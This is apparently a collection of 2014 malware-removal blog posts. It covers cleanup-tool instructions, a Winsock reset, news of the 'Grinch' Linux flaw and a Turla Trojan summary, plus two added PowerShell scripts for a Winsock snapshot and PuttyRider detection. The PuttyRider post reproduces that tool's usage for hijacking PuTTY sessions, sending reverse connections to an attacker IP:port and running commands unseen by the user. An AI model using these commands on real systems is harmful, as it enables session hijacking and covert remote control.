Wednesday, December 31, 2014

Powershell Has Stopped Working & Trojans

Ref: https://forums.malwarebytes.org/index.php?/topic/159960-powershell-has-stopped-working-trojans/

Please run a Threat Scan with Malwarebytes

Start Malwarebytes 2.0..........
Click on Settings > Detection and Protection > Non-Malware Protection > PUP (Potentially Unwanted Program) detections > Make sure it's set to Treat detections as malware
Same for PUM (Potentially Unwanted Modifications)
Quarantine all that's found
Post the log (save the log as a .txt file, not .xml)


Then......

Please download and run RogueKiller 32 bit to your desktop.

RogueKiller <--- use this one for 64 bit systems

    Which system am I using?

Quit all running programs.

For Windows XP, double-click to start.
For Vista or Windows 7-8, do a right-click on the program, select Run as Administrator to start, & when prompted Allow to run.


Wait for the Prescan to finish

Click Scan to scan the system.


Don't run any other options, they're not all bad!!!!!!!

RogueKiller logs will also be located here:
%programdata%\RogueKiller\Logs <------- W7
C:\Documents and Settings\All Users\Application Data\RogueKiller\Logs <------- XP
________________________________________________________________________________

Download the attached fixlist.txt to the same folder as FRST.exe/FRST64.exe.

Run FRST.exe/FRST64.exe and click Fix only once and wait


The tool will create a log (Fixlog.txt) in the folder, please post it to your reply.

Then...........

Please download and run ComboFix.

The most important things to remember when running it are to disable all your anti-malware programs and to run ComboFix from your desktop.

Please visit this webpage for download links, and instructions for running ComboFix

http://www.bleepingc...to-use-combofix

http://www.bleepingc...combofix/dl/12/

Please make sure you click download buttons that look similar to this, not "sponsored ad links":

Ensure you have disabled all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

Information on disabling your malware programs can be found Here.

Make sure you run ComboFix from your desktop.

Give it at least 30-45 minutes to finish if needed.

Please include the C:\ComboFix.txt in your next reply for further review.


----------NOTE<----------
If you get the message Illegal operation attempted on registry key that has been marked for deletion after you run ComboFix....please reboot the computer, this should resolve the problem. You may have to do this several times if needed.

________________________________________________________________________________
Let's check your computer's security before you go, and we have a little cleanup to do also:

Download Security Check by screen317 from HERE or HERE.

·         Save it to your Desktop.
·         Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
·         If you get Unsupported operating system. Aborting now, just reboot and try again.
·         A Notepad document should open automatically called checkup.txt.


_______________________________________________________________________________
A little clean up to do....

Please Uninstall ComboFix: (------->if you used it<-------)

Press the Windows logo key + R to bring up the "run box"

Copy and paste next command in the field:

ComboFix /uninstall

Make sure there's a space between Combofix and /

Then hit enter. (it may look like CF is re-installing but it's not)
This will uninstall Combofix, delete its related folders and files, hide file extensions, hide the system/hidden files, clear the System Restore cache and create a new Restore point.

(If that doesn't work.....you can simply rename ComboFix.exe to Uninstall.exe and double click it to complete the uninstall or download and run the uninstaller)

---------------------------------

Download Delfix from here and save it to your desktop. (you may already have this)

·         Ensure Remove disinfection tools is checked.
·         Click the Run button.
·         Reboot
Any other programs or logs that are still remaining, you can manually delete. (right click.....Delete)
i.e.: RogueKiller.exe, RKreport.txt, RK_Quarantine folder, C:\FRST folder, FRST-OlderVersion folder, MBAR folder, etc....AdwCleaner > just run the program and click uninstall.

Note:
If you used FRST and can't delete the quarantine folder:
Download the fixlist.txt to the same folder as FRST.exe.
Run FRST.exe and click Fix only once and wait
That will delete the quarantine folder created by FRST.
The rest you can manually delete.

CMI Limited - Remove this Junk

Well, last day of the year and out with a bang: saw a system with a ton of rogue applications installed, one being:

Tuesday, December 30, 2014

Fix Winsock

Winsock Fix for Windows Computers

After removing spyware or malware, if you have problems connecting to the Internet, you may need to initialize your TCP/IP network settings. To restore your connection, follow the directions below for the type of Windows computer you use.

Windows 7 computers

Click Start in the lower-left corner of the screen.
Click in the Start Search box and type the following command:

cmd

When cmd.exe appears in the Programs box, right-click it and select Run as administrator as shown in the following graphic:

Click Continue if the User Account Control dialog box prompts you whether to run this program.

In the window that appears, type the following command:

netsh winsock reset

The window should look similar to the following:

Press ENTER.
Restart your computer.
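The same Winsock reset, as an added example that is not part of the original post: a PowerShell wrapper that refuses to run unelevated, saves the Winsock catalog to the Desktop first so you can see which provider DLLs were registered before the reset, and flags providers that live outside the Windows system directory (a heuristic, not a verdict). File name and the "outside system directory" check are assumptions of this example.

```powershell
# Added example, not part of the original post. Run from an elevated PowerShell.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Write-Error 'Open PowerShell with "Run as administrator" and run this again.'
    exit 1
}

# Snapshot the current Winsock catalog before touching it (file name is an
# assumption of this example).
$snapshot = Join-Path ([Environment]::GetFolderPath('Desktop')) 'winsock-catalog-before-reset.txt'
netsh winsock show catalog | Out-File -FilePath $snapshot -Encoding ascii
Write-Host "Winsock catalog saved to $snapshot"

# Heuristic: legitimate providers such as mswsock.dll live under the system
# directory (the catalog writes them as %SystemRoot%\system32\...). A provider
# registered from anywhere else deserves a closer look before you reset.
$sysDir = [Environment]::SystemDirectory
Select-String -Path $snapshot -Pattern 'Provider Path:\s*(.+)$' | ForEach-Object {
    $raw  = $_.Matches[0].Groups[1].Value.Trim()
    $path = [Environment]::ExpandEnvironmentVariables($raw)
    if ($path -notlike "$sysDir\*") {
        Write-Warning "Winsock provider outside ${sysDir}: $path"
    }
}

# Reset the catalog to its default state; Windows needs a reboot to complete it.
netsh winsock reset
Write-Host 'Winsock reset done. Restart the computer to finish.'
```

Keep the saved catalog file with your other logs; it records what was installed before the reset wiped it, which is useful if the connectivity problem returns.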

Wednesday, December 17, 2014

The Grinch

http://www.techworm.net/2014/12/linux-grinch-vulnerability.html#prettyPhoto

All Linux Platforms are vulnerable to the ‘Grinch’ Root Access vulnerability

Security researchers at Alert Logic have unearthed a vulnerability in Linux platforms that could potentially affect every system even remotely using Linux, including Android smartphones and tablets. This vulnerability, dubbed “Grinch”, could potentially allow a user to get root access to a system, thereby bypassing all security mechanisms and leaving the target machine utterly defenseless. This flaw can be used across Linux-powered computers, servers and even Android devices. Alert Logic states,

According to a 2013 report from W3Tech, approximately 65% of all web servers on the Internet utilize a Unix/Linux based operating system. We uncovered a bug that impacts all Linux platforms, including mobile devices, and we’re calling it “grinch.” Fortunately, there are ways to detect the exploit of this bug in your environment until a patch is released.

Exploitation of the logging system

This isn’t the first major vulnerability to be uncovered in Linux. The same researchers had uncovered vulnerabilities in JournalD back in August 2014, which allowed attackers to hijack terminal sessions to execute commands remotely. Further digging led them to grinch. The vulnerability was found in a Linux authorization system and could give an unauthorized user root access to the system by leveraging “wheel,” a special user group that controls access to the su command and allows one user to operate as if they were another. Writing on the Alert Logic blog, Chief Security Evangelist Stephen Coty stated,

“If we were to compromise the user through a client-side vulnerability or any privilege escalation on the box itself, we would no longer need to worry about cached Sudo authorization timestamp tokens or trying to trick users into providing their credentials with bashrc, environment modifications, or other means,” the researchers explained. “Instead, we can abuse the user’s group privileges to give us access, thus granting direct authentication bypass even if the wheel user cannot get root like in Ubuntu ecosystems.”

A potential hacker could exploit the Grinch flaw either by modifying the registered user accounts in the wheel group or by manipulating Policy Kit (Polkit), a graphical user interface for managing privileged operations for ordinary users.

“Polkit can be used by privileged processes to decide if it should execute privileged operations on behalf of the requesting user. For directly executed tools, Polkit provides a setuid-root helper program called ‘pkexec.’ The hooks to ask the user for authorizations are well integrated into text environments and native in all major graphical environments,” notes Alert Logic in a blog.

Whichever method the attacker uses, the goal is to gain root access to the system. With root access, the attacker has full administrative control and can install or modify programs and access files in any directory. The attacker is also able to remotely control the system, implying they can create a replicating worm which can be spread to other systems instantaneously.

Threat perception

With approximately 65% of web servers running on Linux/Unix, the threat of this vulnerability cannot be emphasized enough. Major companies that run their services on Linux-based systems, including the cloud servers of Amazon and Microsoft, will be affected. Not to mention the half a billion users of Android around the world who are at risk. “We find that possession of user logs and knowledge of your own environment are the best security content to help you navigate away from a bug like grinch,” the team advised. “Know how your Linux administrator is installing packages and managing updates.”

On the bright side, the researchers also said they have no reports of this vulnerability ever being used so far, so no major damage has been done. It is advised to restrict user permissions on your Linux systems and also monitor user activity until a proper patch is released.

On the vulnerability level, Grinch could be to Linux what ShellShock is to Windows. Until and unless a patch is released, all the devices running on Linux are vulnerable to Grinch. The Linux team is yet to confirm Alert Logic’s finding or issue a patch for this vulnerability, but Coty believed that Linux was working on this issue.

How Public Is Your Private Information

Thursday, December 11, 2014

PuttyRider


PuttyRider is a tool that performs DLL injection into Putty and allows an attacker to inject Linux commands into the hijacked session.
REF: https://github.com/seastorm/PuttyRider

PuttyRider
Hijack Putty sessions in order to sniff conversation and inject Linux commands.

Download
PuttyRider-bin.zip

Documentation
Defcamp 2014 presentation - pdf
Defcamp 2014 presentation - video

Examples:
List existing Putty processes and their status (injected / not injected)

  • PuttyRider.exe -l


Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

  • PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

  • PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

  • PuttyRider.exe -x

Usage:
Operation modes:
    -l      List the running Putty processes and their connections

    -w      Inject in all existing Putty sessions and wait for new sessions
            to inject in those also

    -p PID  Inject only in existing Putty session identified by PID.
            If PID==0, inject in the first Putty found

    -x      Cleanup. Remove the DLL from all running Putty instances

    -d      Debug mode. Only works with -p mode

    -c CMD  Automatically execute a Linux command after successful injection
            PuttyRider will remove trailing spaces and '&' character from CMD
            PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD

    -h      Print this help

Output modes:
    -f          Write all Putty conversation to a file in the local directory.
                The filename will have the PID of current putty.exe appended

    -r IP:PORT  Initiate a reverse connection to the specified machine and
                start an interactive session.

Interactive commands (after you receive a reverse connection):
    !status     See if the Putty window is connected to user input

    !discon     Disconnect the main Putty window so it won't display anything
                This is useful to send commands without the user noticing

    !recon      Reconnect the Putty window to its normal operation mode

    CMD         Linux shell commands

    !exit       Terminate this connection

    !help       Display help for client connection

Compiling:
Use Visual Studio Command Prompt:

  • nmake main dll


Acknowledgements
Thanks to Brett Moore of Insomnia Security for his proof of concept PuttyHijack
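A defender-side check for the technique documented above, as an added example that is not part of the PuttyRider project: it looks for the three footprints the usage text implies (PuttyRider.dll loaded inside putty.exe, an extra TCP connection owned by putty.exe from the -r reverse-connection mode, and a resident PuttyRider.exe that re-injects in -w mode). It assumes the DLL and EXE keep their default names; reading another user's process modules needs an elevated PowerShell, and a 32-bit PowerShell cannot enumerate modules of a 64-bit putty.exe.

```powershell
# Added detection example, not part of PuttyRider. Run elevated, in a PowerShell
# whose bitness matches putty.exe. Assumes default file names (an assumption).
$findings = New-Object System.Collections.Generic.List[string]

foreach ($p in Get-Process -Name putty -ErrorAction SilentlyContinue) {
    # 1. Is PuttyRider.dll mapped into this putty.exe?
    try { $mods = $p.Modules } catch {
        Write-Warning "Cannot read modules of putty.exe PID $($p.Id): $_"
        continue
    }
    foreach ($m in $mods) {
        if ($m.ModuleName -ieq 'PuttyRider.dll') {
            $findings.Add("putty.exe PID $($p.Id) has PuttyRider.dll loaded from $($m.FileName)")
        }
    }
    # 2. Every established connection owned by putty.exe. A normal session has one
    #    (the SSH/Telnet server); -r adds a second one, from the DLL to the attacker.
    #    Compare the list against the server the user actually connected to.
    Get-NetTCPConnection -OwningProcess $p.Id -State Established -ErrorAction SilentlyContinue |
        ForEach-Object {
            $findings.Add("putty.exe PID $($p.Id) connected to $($_.RemoteAddress):$($_.RemotePort)")
        }
}

# 3. In -w mode PuttyRider.exe stays resident and re-injects every new putty.exe,
#    so ejecting the DLL (-x) is pointless until this process is stopped.
foreach ($p in Get-Process -Name PuttyRider -ErrorAction SilentlyContinue) {
    $findings.Add("PuttyRider.exe is running as PID $($p.Id) from $($p.Path)")
}

if ($findings.Count -eq 0) { 'No PuttyRider indicators found.' } else { $findings }
```

Get-NetTCPConnection needs Windows 8 / Server 2012 or later; on older systems substitute `netstat -ano` and match the PID column by hand. A renamed DLL defeats check 1, which is why the connection list in check 2 is the more durable signal.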

Tuesday, December 9, 2014

Turla Epic Snake


Trojan.Turla

Risk Level 1: Very Low
Discovered: January 13, 2014
Updated: August 8, 2014 10:55:40 AM
Type: Trojan

Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

Trojan.Turla is a Trojan horse that may open a back door and steal information on the compromised computer.

Threat Assessment
Wild
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Medium
Payload: Opens a back door.
Releases Confidential Info: Steals information and sends it back to a remote server.
Distribution
Distribution Level: Low